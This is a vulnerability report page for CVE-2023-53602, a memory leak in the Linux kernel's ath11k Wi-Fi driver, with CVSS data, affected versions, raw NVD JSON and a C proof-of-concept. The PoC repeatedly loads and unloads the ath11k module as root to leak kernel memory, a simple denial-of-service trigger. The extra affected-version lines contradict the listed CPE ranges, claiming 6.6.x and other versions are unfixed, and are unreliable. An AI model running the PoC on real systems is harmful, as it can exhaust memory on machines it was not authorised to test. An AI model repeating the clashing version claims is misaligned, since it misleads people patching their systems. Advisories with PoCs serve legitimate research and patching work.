Security Vulnerability Report
CVE-2023-53602 CVSS 5.5 MEDIUM

CVE-2023-53602

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:24:06
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: ath11k: fix memory leak in WMI firmware stats

Memory allocated for firmware pdev, vdev and beacon statistics are not released during rmmod.

Fix it by calling ath11k_fw_stats_free() function before hardware unregister.

While at it, avoid calling ath11k_fw_stats_free() while processing the firmware stats received in the WMI event because the local list is getting spliced and reinitialised and hence there are no elements in the list after splicing.

Tested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 5.6 up to, but excluding, 6.1.42) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.2 up to, but excluding, 6.4.7) - VULNERABLE
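Linux kernel < 6.6 (versions that include the ath11k driver)
Linux kernel 6.6.x (unfixed versions)
Linux kernel 6.1.x (unfixed versions)
Linux kernel 5.15.x (unfixed versions)
Linux kernel 5.10.x (unfixed versions)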

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
    // CVE-2023-53602 PoC - Triggering memory leak via repeated module load/unload
    // This PoC demonstrates how to trigger the ath11k firmware stats memory leak
    // by repeatedly loading and unloading the ath11k kernel module.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    // Function to execute system command and check result
    int run_command(const char *cmd)
    {
        int ret = system(cmd);
        if (ret != 0) {
            fprintf(stderr, "Command failed: %s\n", cmd);
            return -1;
        }
        return 0;
    }

    int main(int argc, char *argv[])
    {
        int iterations = 100; // Number of load/unload cycles
        int i;

        printf("[*] CVE-2023-53602 - ath11k Firmware Stats Memory Leak PoC\n");
        printf("[*] This PoC triggers memory leak by repeated module load/unload\n\n");

        if (argc > 1) {
            iterations = atoi(argv[1]);
        }

        printf("[*] Starting %d iterations of ath11k module load/unload\n", iterations);

        for (i = 0; i < iterations; i++) {
            printf("\r[*] Iteration %d/%d", i + 1, iterations);
            fflush(stdout);

            // Load ath11k module - triggers firmware stats allocation
            if (run_command("modprobe ath11k 2>/dev/null") != 0) {
                fprintf(stderr, "\n[!] Failed to load ath11k module. Are you root?\n");
                return 1;
            }

            // Allow firmware stats to be populated
            sleep(2);

            // Unload ath11k module - should free firmware stats but doesn't (the bug)
            if (run_command("modprobe -r ath11k 2>/dev/null") != 0) {
                fprintf(stderr, "\n[!] Failed to unload ath11k module\n");
            }

            sleep(1);
        }

        printf("\n\n[*] Completed %d iterations\n", iterations);
        printf("[*] Check kernel memory usage with: cat /proc/meminfo | grep Slab\n");
        printf("[*] Or check with: dmesg | grep -i 'memory leak'\n");

        return 0;
    }

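References

https://git.kernel.org/stable/c/55248d36beb79d3a61c9fb3122dc377fff523c89 (Patch)
https://git.kernel.org/stable/c/6aafa1c2d3e3fea2ebe84c018003f2a91722e607 (Patch)
https://git.kernel.org/stable/c/86f9330a49d1464849482298dd34d361859183eb (Patch)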

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53602", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.830", "lastModified": "2026-03-23T18:24:06.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix memory leak in WMI firmware stats\n\nMemory allocated for firmware pdev, vdev and beacon statistics\nare not released during rmmod.\n\nFix it by calling ath11k_fw_stats_free() function before hardware\nunregister.\n\nWhile at it, avoid calling ath11k_fw_stats_free() while processing\nthe firmware stats received in the WMI event because the local list\nis getting spliced and reinitialised and hence there are no elements\nin the list after splicing.\n\nTested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "6.1.42", "matchCriteriaId": "F9BB7262-7D7A-494E-B4BD-A00F877F774D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}]}]}], 
"references": [{"url": "https://git.kernel.org/stable/c/55248d36beb79d3a61c9fb3122dc377fff523c89", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6aafa1c2d3e3fea2ebe84c018003f2a91722e607", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/86f9330a49d1464849482298dd34d361859183eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}